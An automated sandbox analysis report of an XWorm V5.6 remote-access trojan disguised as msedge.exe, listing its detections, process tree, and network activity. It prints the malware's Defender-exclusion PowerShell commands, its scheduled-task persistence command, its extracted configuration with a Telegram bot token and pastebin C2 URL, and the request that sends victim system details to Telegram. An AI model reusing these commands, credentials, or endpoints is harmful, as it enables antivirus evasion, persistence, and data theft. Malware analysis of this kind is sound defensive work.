
Windows Analysis Report
msedge.exe

Overview

General Information

Sample name: msedge.exe
Analysis ID: 1487310
MD5: aee20d80f94ae0885bb2cabadb78efc9
SHA1: 1e82eba032fcb0b89e1fdf937a79133a5057d0a1
SHA256: 498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d
Tags: exe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • msedge.exe (PID: 3840 cmdline: "C:\Users\user\Desktop\msedge.exe" MD5: AEE20D80F94AE0885BB2CABADB78EFC9)
    • powershell.exe (PID: 6968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5008 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 3392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msedge.exe (PID: 6648 cmdline: C:\Users\user\AppData\Local\msedge.exe MD5: AEE20D80F94AE0885BB2CABADB78EFC9)
  • msedge.exe (PID: 3176 cmdline: "C:\Users\user\AppData\Local\msedge.exe" MD5: AEE20D80F94AE0885BB2CABADB78EFC9)
  • msedge.exe (PID: 7048 cmdline: "C:\Users\user\AppData\Local\msedge.exe" MD5: AEE20D80F94AE0885BB2CABADB78EFC9)
  • msedge.exe (PID: 1512 cmdline: C:\Users\user\AppData\Local\msedge.exe MD5: AEE20D80F94AE0885BB2CABADB78EFC9)
  • cleanup
{"C2 url": "https://pastebin.com/raw/RPPi3ByL", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187"}
{"C2 url": "https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage"}
Source | Rule | Description | Author
msedge.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
msedge.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
msedge.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8b3e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8bdb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8cf0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x87b6:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author
C:\Users\user\AppData\Local\msedge.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\msedge.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\msedge.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8b3e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8bdb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8cf0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x87b6:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author
00000000.00000002.3362810960.0000000002982000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x115fe:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1169b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x117b0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x11276:$cnc4: POST / HTTP/1.1
00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x893e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x89db:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8af0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x85b6:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author
0.0.msedge.exe.590000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.msedge.exe.590000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.msedge.exe.590000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8b3e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8bdb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8cf0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x87b6:$cnc4: POST / HTTP/1.1

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', ProcessId: 6968, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', ProcessId: 6968, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\msedge.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\msedge.exe, ProcessId: 3840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', ProcessId: 6968, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\msedge.exe, ProcessId: 3840, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', ProcessId: 6968, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe", ProcessId: 5008, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', ProcessId: 6968, ProcessName: powershell.exe

No Snort rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-08-03T20:11:28.691332+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:38.074505+0200 | 2852923 | 49722 | 7000 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:38.696832+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:52.511794+0200 | 2852923 | 49722 | 7000 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:55.631124+0200 | 2852874 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:12:06.948813+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:43.679696+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:18.800314+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:23.649351+0200 | 2852923 | 49722 | 7000 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:13.677035+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:53.694351+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:23.793667+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:12:03.700019+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:12:13.700722+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:48.683210+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:58.696172+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:12:12.990412+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:38.072914+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:08.809199+0200 | 2853685 | 49721 | 443 | TCP | A Network Trojan was detected
2024-08-03T20:12:06.950681+0200 | 2852923 | 49722 | 7000 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:25.636313+0200 | 2852874 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:52.509901+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:12:12.991173+0200 | 2852923 | 49722 | 7000 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:23.448430+0200 | 2855924 | 49722 | 7000 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:33.687117+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:12:08.705779+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected
2024-08-03T20:11:23.647357+0200 | 2852870 | 7000 | 49722 | TCP | Malware Command and Control Activity Detected

AV Detection

Source: msedge.exe | Avira: detected
Source: C:\Users\user\AppData\Local\msedge.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: msedge.exe | Malware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/RPPi3ByL", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187"}
Source: msedge.exe.3840.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage"}
Source: C:\Users\user\AppData\Local\msedge.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\msedge.exe | Virustotal: Detection: 65%
Source: msedge.exe | Virustotal: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\msedge.exe | Joe Sandbox ML: detected
Source: msedge.exe | Joe Sandbox ML: detected
Source: msedge.exe | String decryptor: https://pastebin.com/raw/RPPi3ByL
Source: msedge.exe | String decryptor: <123456789>
Source: msedge.exe | String decryptor: <Xwormmm>
Source: msedge.exe | String decryptor: XWorm V5.6
Source: msedge.exe | String decryptor: USB.exe
Source: msedge.exe | String decryptor: %LocalAppData%
Source: msedge.exe | String decryptor: msedge.exe
Source: msedge.exe | String decryptor: 7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4
Source: msedge.exe | String decryptor: 5279018187
Source: msedge.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: msedge.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Malware configuration extractor | URLs: https://pastebin.com/raw/RPPi3ByL
Source: unknown | DNS query: name: pastebin.com
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: msedge.exe, type: SAMPLE
Source: Yara match | File source: 0.0.msedge.exe.590000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.6:49722 -> 213.219.149.161:7000
Source: global traffic | HTTP traffic detected: GET /raw/RPPi3ByL HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | TCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic; HTTP traffic detected: GET /raw/RPPi3ByL HTTP/1.1; Host: pastebin.com; Connection: Keep-Alive
                    Source: global traffic; HTTP traffic detected: GET /bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1; Host: api.telegram.org; Connection: Keep-Alive
                    Source: global traffic; DNS traffic detected: DNS query: pastebin.com
                    Source: global traffic; DNS traffic detected: DNS query: api.telegram.org
                    Source: powershell.exe, 00000005.00000002.2319654280.0000016F7D6B7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
                    Source: powershell.exe, 0000000D.00000002.2697571611.00000215ECDC0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.mB
                    Source: powershell.exe, 0000000A.00000002.2471243355.0000026C23F78000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.mic
                    Source: powershell.exe, 0000000A.00000002.2471243355.0000026C23F78000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micft.cMicRosof
                    Source: powershell.exe, 0000000D.00000002.2693896616.00000215ECD14000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://micrLISTt.couS
                    Source: powershell.exe, 00000002.00000002.2203968122.0000020A19881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2294712290.0000016F10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2445383429.0000026C1B7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000005.00000002.2319002787.0000016F7D66C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://schemas.micr
                    Source: powershell.exe, 00000002.00000002.2185819233.0000020A09A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: msedge.exe, 00000000.00000002.3362810960.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2185819233.0000020A09811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000002.00000002.2185819233.0000020A09A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000002.00000002.2209890780.0000020A21CDA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                    Source: powershell.exe, 0000000D.00000002.2691169117.00000215ECAE0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 00000002.00000002.2185819233.0000020A09811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002925000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org
                    Source: msedge.exe, msedge.exe.0.dr; String found in binary or memory: https://api.telegram.org/bot
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002925000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=52790
